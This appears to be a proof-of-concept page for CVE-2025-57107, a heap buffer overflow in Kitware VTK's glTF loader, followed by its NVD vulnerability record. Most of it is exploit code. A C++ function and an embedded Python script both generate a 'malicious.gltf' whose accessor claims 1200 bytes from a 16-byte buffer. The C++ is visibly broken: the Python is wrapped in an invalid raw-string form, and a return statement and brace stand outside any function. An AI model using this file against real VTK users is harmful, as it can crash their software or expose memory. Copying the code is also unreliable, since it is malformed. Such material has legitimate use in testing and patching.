CVE-2025-57107

// CVE-2025-57107 PoC - Malicious GLTF file for Kitware VTK heap buffer overflow // This PoC demonstrates a malformed GLTF file that triggers the vulnerability // in vtkGLTFDocumentLoader's Accessor copy constructor #include <iostream> #include <fstream> #include <vector> // Create a malicious GLTF JSON that triggers buffer boundary validation failure std::string createMaliciousGLTF() { // Malicious GLTF with crafted accessor parameters // The accessor points beyond actual buffer boundaries std::string gltf = R"({ "asset": {"version": "2.0"}, "buffers": [ { "byteLength": 16, "uri": "data:application/octet-stream;base64,AAAAAAAAAAAAAAAA" } ], "bufferViews": [ { "buffer": 0, "byteOffset": 0, "byteLength": 16 } ], "accessors": [ { "bufferView": 0, "componentType": 5126, "count": 100, "type": "VEC3", "max": [1.0, 1.0, 1.0], "min": [-1.0, -1.0, -1.0] } ], "meshes": [ { "primitives": [ { "attributes": {"POSITION": 0} } ] } ] })"; return gltf; } // Alternative: Python script to generate malicious GLTF std::string pythonPoC = R""" #!/usr/bin/env python3 # CVE-2025-57107 PoC - Generate malicious GLTF file # Triggers heap buffer overflow in Kitware VTK vtkGLTFDocumentLoader import json import base64 def create_poc_gltf(): # Create a minimal buffer (16 bytes) buffer_data = b'\x00' * 16 buffer_uri = "data:application/octet-stream;base64," + base64.b64encode(buffer_data).decode() # Malicious GLTF with accessor requesting more data than buffer contains # count: 100 with VEC3 (3 floats each) = 1200 bytes, but buffer is only 16 bytes gltf = { "asset": {"version": "2.0"}, "buffers": [{ "byteLength": 16, "uri": buffer_uri }], "bufferViews": [{ "buffer": 0, "byteOffset": 0, "byteLength": 16 }], "accessors": [{ "bufferView": 0, "componentType": 5126, # FLOAT "count": 100, # Requests 100 * 3 * 4 = 1200 bytes "type": "VEC3", "max": [1.0, 1.0, 1.0], "min": [-1.0, -1.0, -1.0] }], "meshes": [{ "primitives": [{ "attributes": {"POSITION": 0} }] }] } with open('malicious.gltf', 'w') as f: json.dump(gltf, f, indent=2) print("Malicious GLTF file created: malicious.gltf") if __name__ == "__main__": create_poc_gltf() """ return pythonPoC; }

{"cve": {"id": "CVE-2025-57107", "sourceIdentifier": "[email protected]", "published": "2025-10-31T15:15:42.443", "lastModified": "2025-11-05T19:42:17.657", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kitware VTK (Visualization Toolkit) through 9.5.0 contains a heap buffer overflow vulnerability in vtkGLTFDocumentLoader. When processing specially crafted GLTF files, the copy constructor of Accessor objects fails to properly validate buffer boundaries before performing memory read operations."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-122"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vtk:vtk:*:*:*:*:*:*:*:*", "versionEndIncluding": "9.5.0", "matchCriteriaId": "4FACF42A-92AA-4011-9219-A8F328C6FF63"}]}]}], "references": [{"url": "https://gitlab.kitware.com/vtk/vtk/-/issues/19732", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}